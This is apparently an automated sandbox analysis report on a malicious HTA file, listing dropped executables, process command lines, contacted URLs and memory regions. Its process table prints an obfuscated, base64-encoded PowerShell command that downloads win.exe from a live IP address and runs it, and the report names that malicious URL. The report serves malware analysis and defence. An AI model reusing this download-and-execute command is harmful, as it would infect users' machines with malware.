Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
seemejkiss.hta
|
HTML document, ASCII text, with very long lines (65536), with no line terminators
|
initial sample
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\win[1].exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\5zyziwbf\5zyziwbf.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\5zyziwbf\5zyziwbf.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Roaming\winnit.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\5zyziwbf\5zyziwbf.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (361)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\5zyziwbf\5zyziwbf.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (449), with CRLF, CR line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\5zyziwbf\CSCADB73B4CC47C40A8804A92B1B0BD1E62.TMP
|
MSVC .res
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Glagolitic
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\RES3925.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Sat Dec 7 16:45:41 2024,
1st section name ".debug$S"
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gjwt3tzc.v2e.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mos5rxu3.ovp.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nqum0uuf.v2f.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wohg2k5o.5u2.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\aut54AB.tmp
|
data
|
dropped
|
There are 6 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\SysWOW64\mshta.exe
|
mshta.exe "C:\Users\user\Desktop\seemejkiss.hta"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" "/C pOWErshEll -EX BYpasS
-nOP -W 1 -c
dEviCeCredENTIaLDeplOYmEnT ; iNvOke-ExPrEssioN($(inVOkE-EXPrESsiON('[SysTEm.tEXt.EncodinG]'+[CHAr]58+[ChAR]58+'UTf8.gEtSTRing([sYStEM.CoNVeRt]'+[CHAR]58+[Char]0x3a+'FRoMbasE64stRinG('+[chAr]0x22+'JG9ZdHRwUm5vICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFZmluSXRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NjYk9WYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ2QktSVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBiTUNmTnR4cCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcVBpZ1RIQkosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCdFJmbmN1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkhmVUhiZkVLRUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRXNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c0FNS05icCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9ZdHRwUm5vOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMTk2LzQwMC93aW4uZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U3RBcnQtc0xlRVAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[Char]0X22+'))')))"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
pOWErshEll -EX BYpasS -nOP
-W 1 -c dEviCeCredENTIaLDeplOYmEnT
; iNvOke-ExPrEssioN($(inVOkE-EXPrESsiON('[SysTEm.tEXt.EncodinG]'+[CHAr]58+[ChAR]58+'UTf8.gEtSTRing([sYStEM.CoNVeRt]'+[CHAR]58+[Char]0x3a+'FRoMbasE64stRinG('+[chAr]0x22+'JG9ZdHRwUm5vICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFZmluSXRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NjYk9WYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ2QktSVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBiTUNmTnR4cCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcVBpZ1RIQkosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCdFJmbmN1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkhmVUhiZkVLRUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRXNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c0FNS05icCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9ZdHRwUm5vOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMTk2LzQwMC93aW4uZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U3RBcnQtc0xlRVAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[Char]0X22+'))')))"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5zyziwbf\5zyziwbf.cmdline"
|
||
C:\Users\user\AppData\Roaming\winnit.exe
|
"C:\Users\user\AppData\Roaming\winnit.exe"
|
||
C:\Windows\SysWOW64\svchost.exe
|
"C:\Users\user\AppData\Roaming\winnit.exe"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3925.tmp"
"c:\Users\user\AppData\Local\Temp\5zyziwbf\CSCADB73B4CC47C40A8804A92B1B0BD1E62.TMP"
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://107.175.113.196/400/win.exe
|
107.175.113.196
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://aka.ms/winsvr-2022-pshelp
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
https://aka.ms/pscore6lB
|
unknown
|
||
http://107.175.113.196/400/win.exeV
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
http://107.175.113.196/400/win.e
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
There are 6 hidden URLs, click here to show them.
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
107.175.113.196
|
unknown
|
United States
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
400000
|
system
|
page execute and read and write
|
||
3950000
|
direct allocation
|
page read and write
|
||
3909000
|
direct allocation
|
page read and write
|
||
5251000
|
heap
|
page read and write
|
||
697A000
|
heap
|
page read and write
|
||
5FC3000
|
heap
|
page read and write
|
||
5DD0000
|
heap
|
page read and write
|
||
6276000
|
trusted library allocation
|
page read and write
|
||
6038000
|
heap
|
page read and write
|
||
6930000
|
heap
|
page read and write
|
||
1026000
|
heap
|
page read and write
|
||
35D2000
|
heap
|
page read and write
|
||
6670000
|
trusted library allocation
|
page read and write
|
||
5D68000
|
heap
|
page read and write
|
||
3213000
|
heap
|
page read and write
|
||
5DD1000
|
heap
|
page read and write
|
||
691F000
|
stack
|
page read and write
|
||
E4E000
|
stack
|
page read and write
|
||
7A0000
|
heap
|
page read and write
|
||
6187000
|
trusted library allocation
|
page read and write
|
||
172E000
|
stack
|
page read and write
|
||
2E23000
|
heap
|
page read and write
|
||
6982000
|
heap
|
page read and write
|
||
6987000
|
heap
|
page read and write
|
||
60E5000
|
trusted library allocation
|
page read and write
|
||
3213000
|
heap
|
page read and write
|
||
380F000
|
stack
|
page read and write
|
||
3405000
|
heap
|
page read and write
|
||
5CC3000
|
heap
|
page read and write
|
||
2E00000
|
trusted library allocation
|
page read and write
|
||
7D5000
|
heap
|
page read and write
|
||
5F9C000
|
heap
|
page read and write
|
||
32F9000
|
trusted library allocation
|
page read and write
|
||
88B1000
|
heap
|
page read and write
|
||
8E0000
|
heap
|
page read and write
|
||
3213000
|
heap
|
page read and write
|
||
5F5D000
|
heap
|
page read and write
|
||
6791000
|
trusted library allocation
|
page read and write
|
||
524E000
|
stack
|
page read and write
|
||
3909000
|
direct allocation
|
page read and write
|
||
3400000
|
heap
|
page read and write
|
||
697A000
|
heap
|
page read and write
|
||
77CF000
|
stack
|
page read and write
|
||
692A000
|
heap
|
page read and write
|
||
8BC0000
|
trusted library allocation
|
page read and write
|
||
524C000
|
heap
|
page read and write
|
||
6773000
|
trusted library allocation
|
page read and write
|
||
384E000
|
stack
|
page read and write
|
||
55DE000
|
stack
|
page read and write
|
||
5230000
|
heap
|
page read and write
|
||
6075000
|
heap
|
page read and write
|
||
5F52000
|
heap
|
page read and write
|
||
FC9000
|
heap
|
page read and write
|
||
6085000
|
heap
|
page read and write
|
||
3200000
|
heap
|
page read and write
|
||
6055000
|
heap
|
page read and write
|
||
37E0000
|
direct allocation
|
page read and write
|
||
6974000
|
heap
|
page read and write
|
||
8812000
|
trusted library allocation
|
page read and write
|
||
920000
|
heap
|
page read and write
|
||
5FB3000
|
heap
|
page read and write
|
||
724B000
|
stack
|
page read and write
|
||
605D000
|
heap
|
page read and write
|
||
54E4000
|
trusted library allocation
|
page read and write
|
||
78B8000
|
heap
|
page read and write
|
||
3213000
|
heap
|
page read and write
|
||
39B0000
|
direct allocation
|
page read and write
|
||
7560000
|
heap
|
page read and write
|
||
F6F000
|
heap
|
page execute and read and write
|
||
3DD1000
|
direct allocation
|
page execute and read and write
|
||
745A000
|
stack
|
page read and write
|
||
9CE000
|
stack
|
page read and write
|
||
5F65000
|
heap
|
page read and write
|
||
370E000
|
stack
|
page read and write
|
||
5E45000
|
heap
|
page read and write
|
||
5CC2000
|
heap
|
page read and write
|
||
5F67000
|
heap
|
page read and write
|
||
6962000
|
heap
|
page read and write
|
||
9DB000
|
heap
|
page read and write
|
||
47C6000
|
heap
|
page read and write
|
||
D88000
|
stack
|
page read and write
|
||
2E60000
|
heap
|
page read and write
|
||
608E000
|
heap
|
page read and write
|
||
5FB2000
|
heap
|
page read and write
|
||
4FF0000
|
trusted library allocation
|
page read and write
|
||
637D000
|
heap
|
page read and write
|
||
5F65000
|
heap
|
page read and write
|
||
92E000
|
heap
|
page read and write
|
||
39A0000
|
direct allocation
|
page read and write
|
||
698F000
|
heap
|
page read and write
|
||
18E0000
|
heap
|
page read and write
|
||
608D000
|
heap
|
page read and write
|
||
3213000
|
heap
|
page read and write
|
||
6FFC000
|
stack
|
page read and write
|
||
698F000
|
heap
|
page read and write
|
||
603E000
|
heap
|
page read and write
|
||
71C5000
|
heap
|
page execute and read and write
|
||
6055000
|
heap
|
page read and write
|
||
6034000
|
heap
|
page read and write
|
||
892E000
|
heap
|
page read and write
|
||
6055000
|
heap
|
page read and write
|
||
8E8C000
|
stack
|
page read and write
|
||
6987000
|
heap
|
page read and write
|
||
6055000
|
heap
|
page read and write
|
||
F38000
|
heap
|
page read and write
|
||
71C0000
|
heap
|
page execute and read and write
|
||
5FA7000
|
heap
|
page read and write
|
||
6991000
|
heap
|
page read and write
|
||
5FE0000
|
heap
|
page read and write
|
||
8690000
|
trusted library allocation
|
page read and write
|
||
749E000
|
stack
|
page read and write
|
||
5D32000
|
heap
|
page read and write
|
||
3213000
|
heap
|
page read and write
|
||
2E6A000
|
heap
|
page read and write
|
||
49B0000
|
heap
|
page read and write
|
||
840E000
|
direct allocation
|
page read and write
|
||
504C000
|
stack
|
page read and write
|
||
605D000
|
heap
|
page read and write
|
||
6330000
|
heap
|
page read and write
|
||
699C000
|
heap
|
page read and write
|
||
2FF0000
|
heap
|
page read and write
|
||
1026000
|
heap
|
page read and write
|
||
B6E000
|
unkown
|
page read and write
|
||
6F86000
|
direct allocation
|
page read and write
|
||
6075000
|
heap
|
page read and write
|
||
7ACE000
|
stack
|
page read and write
|
||
8F00000
|
trusted library allocation
|
page read and write
|
||
65A0000
|
trusted library allocation
|
page read and write
|
||
7C50000
|
trusted library allocation
|
page read and write
|
||
5F58000
|
heap
|
page read and write
|
||
A1E000
|
stack
|
page read and write
|
||
713E000
|
stack
|
page read and write
|
||
637D000
|
heap
|
page read and write
|
||
9DB000
|
stack
|
page read and write
|
||
5C75000
|
heap
|
page read and write
|
||
5E69000
|
heap
|
page read and write
|
||
6056000
|
heap
|
page read and write
|
||
695C000
|
heap
|
page read and write
|
||
6055000
|
heap
|
page read and write
|
||
6950000
|
heap
|
page read and write
|
||
5271000
|
heap
|
page read and write
|
||
3656000
|
heap
|
page read and write
|
||
6969000
|
heap
|
page read and write
|
||
3590000
|
trusted library allocation
|
page read and write
|
||
87C0000
|
trusted library allocation
|
page read and write
|
||
3310000
|
trusted library allocation
|
page read and write
|
||
6087000
|
heap
|
page read and write
|
||
5140000
|
heap
|
page read and write
|
||
3C2D000
|
direct allocation
|
page execute and read and write
|
||
93D000
|
heap
|
page read and write
|
||
6799000
|
trusted library allocation
|
page read and write
|
||
3213000
|
heap
|
page read and write
|
||
6976000
|
heap
|
page read and write
|
||
928000
|
heap
|
page read and write
|
||
717E000
|
stack
|
page read and write
|
||
6075000
|
heap
|
page read and write
|
||
6075000
|
heap
|
page read and write
|
||
527A000
|
heap
|
page read and write
|
||
3640000
|
direct allocation
|
page read and write
|
||
8FE000
|
heap
|
page read and write
|
||
6976000
|
heap
|
page read and write
|
||
60E7000
|
trusted library allocation
|
page read and write
|
||
681E000
|
stack
|
page read and write
|
||
7180000
|
heap
|
page read and write
|
||
6982000
|
heap
|
page read and write
|
||
37E0000
|
direct allocation
|
page read and write
|
||
6089000
|
heap
|
page read and write
|
||
5FBB000
|
heap
|
page read and write
|
||
5EB4000
|
heap
|
page read and write
|
||
32E0000
|
trusted library allocation
|
page read and write
|
||
FA5000
|
heap
|
page read and write
|
||
697D000
|
heap
|
page read and write
|
||
6974000
|
heap
|
page read and write
|
||
6738000
|
trusted library allocation
|
page read and write
|
||
6034000
|
heap
|
page read and write
|
||
5F5C000
|
heap
|
page read and write
|
||
5E71000
|
heap
|
page read and write
|
||
9C5000
|
heap
|
page read and write
|
||
6087000
|
heap
|
page read and write
|
||
7B0000
|
heap
|
page read and write
|
||
626E000
|
trusted library allocation
|
page read and write
|
||
5FBD000
|
heap
|
page read and write
|
||
699F000
|
heap
|
page read and write
|
||
8F85000
|
trusted library allocation
|
page read and write
|
||
8A50000
|
trusted library allocation
|
page read and write
|
||
925000
|
heap
|
page read and write
|
||
5080000
|
heap
|
page execute and read and write
|
||
995000
|
heap
|
page read and write
|
||
8740000
|
heap
|
page read and write
|
||
995000
|
heap
|
page read and write
|
||
3213000
|
heap
|
page read and write
|
||
32E4000
|
trusted library allocation
|
page read and write
|
||
3501000
|
heap
|
page read and write
|
||
57DE000
|
stack
|
page read and write
|
||
6055000
|
heap
|
page read and write
|
||
6999000
|
heap
|
page read and write
|
||
528D000
|
heap
|
page read and write
|
||
6184000
|
trusted library allocation
|
page read and write
|
||
6056000
|
heap
|
page read and write
|
||
618B000
|
trusted library allocation
|
page read and write
|
||
77D0000
|
trusted library allocation
|
page read and write
|
||
949000
|
heap
|
page read and write
|
||
6580000
|
trusted library allocation
|
page execute
|
||
8760000
|
trusted library allocation
|
page read and write
|
||
8927000
|
heap
|
page read and write
|
||
7C60000
|
trusted library allocation
|
page read and write
|
||
52A3000
|
heap
|
page read and write
|
||
608C000
|
heap
|
page read and write
|
||
8750000
|
trusted library allocation
|
page execute and read and write
|
||
5145000
|
heap
|
page read and write
|
||
6075000
|
heap
|
page read and write
|
||
5FAB000
|
heap
|
page read and write
|
||
37E0000
|
direct allocation
|
page read and write
|
||
F74000
|
heap
|
page read and write
|
||
605D000
|
heap
|
page read and write
|
||
5FBD000
|
heap
|
page read and write
|
||
695C000
|
heap
|
page read and write
|
||
5F5C000
|
heap
|
page read and write
|
||
612A000
|
trusted library allocation
|
page read and write
|
||
32F0000
|
trusted library allocation
|
page read and write
|
||
94A000
|
heap
|
page read and write
|
||
32D0000
|
trusted library allocation
|
page read and write
|
||
70FC000
|
stack
|
page read and write
|
||
5FB0000
|
heap
|
page read and write
|
||
6957000
|
heap
|
page read and write
|
||
8400000
|
direct allocation
|
page read and write
|
||
5FDD000
|
heap
|
page read and write
|
||
934000
|
heap
|
page read and write
|
||
33DE000
|
stack
|
page read and write
|
||
699F000
|
heap
|
page read and write
|
||
9DB000
|
heap
|
page read and write
|
||
6987000
|
heap
|
page read and write
|
||
60DA000
|
trusted library allocation
|
page read and write
|
||
6987000
|
heap
|
page read and write
|
||
6952000
|
heap
|
page read and write
|
||
8770000
|
trusted library allocation
|
page read and write
|
||
A5E000
|
stack
|
page read and write
|
||
6040000
|
heap
|
page read and write
|
||
39B0000
|
direct allocation
|
page read and write
|
||
5F65000
|
heap
|
page read and write
|
||
5E43000
|
heap
|
page read and write
|
||
522C000
|
heap
|
page read and write
|
||
35A0000
|
heap
|
page read and write
|
||
6933000
|
heap
|
page read and write
|
||
921000
|
heap
|
page read and write
|
||
3A9E000
|
heap
|
page read and write
|
||
618F000
|
trusted library allocation
|
page read and write
|
||
915C000
|
stack
|
page read and write
|
||
695C000
|
heap
|
page read and write
|
||
D80000
|
heap
|
page read and write
|
||
770E000
|
stack
|
page read and write
|
||
5E43000
|
heap
|
page read and write
|
||
739E000
|
stack
|
page read and write
|
||
3213000
|
heap
|
page read and write
|
||
935000
|
heap
|
page read and write
|
||
5E76000
|
heap
|
page read and write
|
||
6075000
|
heap
|
page read and write
|
||
5E6F000
|
heap
|
page read and write
|
||
921000
|
heap
|
page read and write
|
||
5120000
|
heap
|
page read and write
|
||
5FDF000
|
heap
|
page read and write
|
||
3DCD000
|
direct allocation
|
page execute and read and write
|
||
3213000
|
heap
|
page read and write
|
||
699B000
|
heap
|
page read and write
|
||
6957000
|
heap
|
page read and write
|
||
3E0000
|
heap
|
page read and write
|
||
5FA5000
|
heap
|
page read and write
|
||
972000
|
heap
|
page read and write
|
||
5FB0000
|
heap
|
page read and write
|
||
5F67000
|
heap
|
page read and write
|
||
66F0000
|
trusted library allocation
|
page read and write
|
||
697A000
|
heap
|
page read and write
|
||
605D000
|
heap
|
page read and write
|
||
699F000
|
heap
|
page read and write
|
||
33F0000
|
heap
|
page read and write
|
||
5100000
|
heap
|
page read and write
|
||
5218000
|
heap
|
page read and write
|
||
390D000
|
direct allocation
|
page read and write
|
||
3397000
|
heap
|
page read and write
|
||
6982000
|
heap
|
page read and write
|
||
6976000
|
heap
|
page read and write
|
||
5F67000
|
heap
|
page read and write
|
||
3315000
|
trusted library allocation
|
page execute and read and write
|
||
157E000
|
stack
|
page read and write
|
||
6974000
|
heap
|
page read and write
|
||
70FD000
|
stack
|
page read and write
|
||
F53000
|
heap
|
page read and write
|
||
5FA7000
|
heap
|
page read and write
|
||
6957000
|
heap
|
page read and write
|
||
8892000
|
heap
|
page read and write
|
||
7100000
|
heap
|
page read and write
|
||
52A1000
|
heap
|
page read and write
|
||
639000
|
stack
|
page read and write
|
||
69A0000
|
heap
|
page read and write
|
||
52A3000
|
heap
|
page read and write
|
||
637D000
|
heap
|
page read and write
|
||
695C000
|
heap
|
page read and write
|
||
83E0000
|
direct allocation
|
page read and write
|
||
94B000
|
heap
|
page read and write
|
||
3763000
|
direct allocation
|
page read and write
|
||
2C6E000
|
stack
|
page read and write
|
||
B64000
|
unkown
|
page readonly
|
||
66B0000
|
trusted library allocation
|
page read and write
|
||
605D000
|
heap
|
page read and write
|
||
6976000
|
heap
|
page read and write
|
||
397E000
|
direct allocation
|
page read and write
|
||
7F3B0000
|
trusted library allocation
|
page execute and read and write
|
||
4FFB000
|
stack
|
page read and write
|
||
735B000
|
stack
|
page read and write
|
||
697D000
|
heap
|
page read and write
|
||
7894000
|
heap
|
page read and write
|
||
912000
|
heap
|
page read and write
|
||
921000
|
heap
|
page read and write
|
||
5FC8000
|
heap
|
page read and write
|
||
9C5000
|
heap
|
page read and write
|
||
3417000
|
heap
|
page read and write
|
||
890F000
|
heap
|
page read and write
|
||
3412000
|
heap
|
page read and write
|
||
6055000
|
heap
|
page read and write
|
||
FC4000
|
heap
|
page read and write
|
||
F8D000
|
heap
|
page read and write
|
||
3213000
|
heap
|
page read and write
|
||
8830000
|
trusted library allocation
|
page execute and read and write
|
||
60D5000
|
trusted library allocation
|
page read and write
|
||
5F50000
|
heap
|
page read and write
|
||
3763000
|
direct allocation
|
page read and write
|
||
5CC2000
|
heap
|
page read and write
|
||
AB0000
|
unkown
|
page readonly
|
||
3213000
|
heap
|
page read and write
|
||
5273000
|
heap
|
page read and write
|
||
13E0000
|
heap
|
page read and write
|
||
528D000
|
heap
|
page read and write
|
||
6957000
|
heap
|
page read and write
|
||
330A000
|
trusted library allocation
|
page execute and read and write
|
||
693A000
|
heap
|
page read and write
|
||
93C000
|
heap
|
page read and write
|
||
6982000
|
heap
|
page read and write
|
||
5D68000
|
heap
|
page read and write
|
||
6965000
|
heap
|
page read and write
|
||
6962000
|
heap
|
page read and write
|
||
6087000
|
heap
|
page read and write
|
||
60E9000
|
trusted library allocation
|
page read and write
|
||
3763000
|
direct allocation
|
page read and write
|
||
8D3E000
|
stack
|
page read and write
|
||
78C1000
|
heap
|
page read and write
|
||
5190000
|
heap
|
page read and write
|
||
6933000
|
heap
|
page read and write
|
||
932000
|
heap
|
page read and write
|
||
3640000
|
direct allocation
|
page read and write
|
||
720F000
|
stack
|
page read and write
|
||
3213000
|
heap
|
page read and write
|
||
698F000
|
heap
|
page read and write
|
||
8EF0000
|
trusted library allocation
|
page read and write
|
||
3763000
|
direct allocation
|
page read and write
|
||
5F9A000
|
heap
|
page read and write
|
||
6F82000
|
direct allocation
|
page read and write
|
||
932000
|
heap
|
page read and write
|
||
699A000
|
heap
|
page read and write
|
||
5FDC000
|
heap
|
page read and write
|
||
925000
|
heap
|
page read and write
|
||
3213000
|
heap
|
page read and write
|
||
637F000
|
heap
|
page read and write
|
||
6969000
|
heap
|
page read and write
|
||
52A3000
|
heap
|
page read and write
|
||
9FC000
|
stack
|
page read and write
|
||
1530000
|
heap
|
page read and write
|
||
94F000
|
heap
|
page read and write
|
||
3330000
|
trusted library allocation
|
page read and write
|
||
2F1D000
|
stack
|
page read and write
|
||
337E000
|
stack
|
page read and write
|
||
697A000
|
heap
|
page read and write
|
||
397E000
|
direct allocation
|
page read and write
|
||
9BB000
|
heap
|
page read and write
|
||
6931000
|
heap
|
page read and write
|
||
5E76000
|
heap
|
page read and write
|
||
1580000
|
heap
|
page read and write
|
||
605D000
|
heap
|
page read and write
|
||
785B000
|
heap
|
page read and write
|
||
3213000
|
heap
|
page read and write
|
||
5F67000
|
heap
|
page read and write
|
||
6087000
|
heap
|
page read and write
|
||
6331000
|
heap
|
page read and write
|
||
778E000
|
stack
|
page read and write
|
||
912000
|
heap
|
page read and write
|
||
6056000
|
heap
|
page read and write
|
||
6794000
|
trusted library allocation
|
page read and write
|
||
697D000
|
heap
|
page read and write
|
||
783B000
|
heap
|
page read and write
|
||
970000
|
heap
|
page read and write
|
||
8FE000
|
heap
|
page read and write
|
||
88DA000
|
heap
|
page read and write
|
||
67B0000
|
trusted library allocation
|
page read and write
|
||
2FE0000
|
heap
|
page read and write
|
||
6F80000
|
direct allocation
|
page read and write
|
||
6731000
|
trusted library allocation
|
page read and write
|
||
B72000
|
unkown
|
page write copy
|
||
692A000
|
heap
|
page read and write
|
||
D8D000
|
stack
|
page read and write
|
||
977000
|
heap
|
page read and write
|
||
B77000
|
unkown
|
page readonly
|
||
60C1000
|
trusted library allocation
|
page read and write
|
||
728D000
|
stack
|
page read and write
|
||
780D000
|
heap
|
page read and write
|
||
5FC3000
|
heap
|
page read and write
|
||
37E0000
|
direct allocation
|
page read and write
|
||
390D000
|
direct allocation
|
page read and write
|
||
8911000
|
heap
|
page read and write
|
||
60D1000
|
trusted library allocation
|
page read and write
|
||
390D000
|
direct allocation
|
page read and write
|
||
5295000
|
heap
|
page read and write
|
||
5FBD000
|
heap
|
page read and write
|
||
6952000
|
heap
|
page read and write
|
||
6976000
|
heap
|
page read and write
|
||
7C80000
|
trusted library allocation
|
page read and write
|
||
37E0000
|
direct allocation
|
page read and write
|
||
3312000
|
trusted library allocation
|
page read and write
|
||
7BF0000
|
trusted library allocation
|
page read and write
|
||
3213000
|
heap
|
page read and write
|
||
AB0000
|
unkown
|
page readonly
|
||
91C000
|
heap
|
page read and write
|
||
697A000
|
heap
|
page read and write
|
||
8820000
|
trusted library section
|
page read and write
|
||
699C000
|
heap
|
page read and write
|
||
3909000
|
direct allocation
|
page read and write
|
||
547C000
|
trusted library allocation
|
page read and write
|
||
397E000
|
direct allocation
|
page read and write
|
||
7562000
|
heap
|
page read and write
|
||
69A1000
|
heap
|
page read and write
|
||
2E20000
|
heap
|
page read and write
|
||
6952000
|
heap
|
page read and write
|
||
3700000
|
heap
|
page read and write
|
||
5F9A000
|
heap
|
page read and write
|
||
B64000
|
unkown
|
page readonly
|
||
6987000
|
heap
|
page read and write
|
||
7C90000
|
trusted library allocation
|
page read and write
|
||
6560000
|
heap
|
page read and write
|
||
692A000
|
heap
|
page read and write
|
||
8D60000
|
trusted library allocation
|
page read and write
|
||
94F000
|
heap
|
page read and write
|
||
3DE000
|
stack
|
page read and write
|
||
3213000
|
heap
|
page read and write
|
||
5F9C000
|
heap
|
page read and write
|
||
36D0000
|
direct allocation
|
page read and write
|
||
5FD0000
|
heap
|
page read and write
|
||
528D000
|
heap
|
page read and write
|
||
52A9000
|
heap
|
page read and write
|
||
5FB3000
|
heap
|
page read and write
|
||
697A000
|
heap
|
page read and write
|
||
3213000
|
heap
|
page read and write
|
||
637F000
|
heap
|
page read and write
|
||
6530000
|
heap
|
page read and write
|
||
697D000
|
heap
|
page read and write
|
||
3658000
|
heap
|
page read and write
|
||
6990000
|
heap
|
page read and write
|
||
5FBD000
|
heap
|
page read and write
|
||
E00000
|
heap
|
page read and write
|
||
7920000
|
trusted library allocation
|
page read and write
|
||
6087000
|
heap
|
page read and write
|
||
3763000
|
direct allocation
|
page read and write
|
||
5FB2000
|
heap
|
page read and write
|
||
3300000
|
trusted library allocation
|
page read and write
|
||
390D000
|
direct allocation
|
page read and write
|
||
50C1000
|
trusted library allocation
|
page read and write
|
||
5F65000
|
heap
|
page read and write
|
||
AB1000
|
unkown
|
page execute read
|
||
6040000
|
heap
|
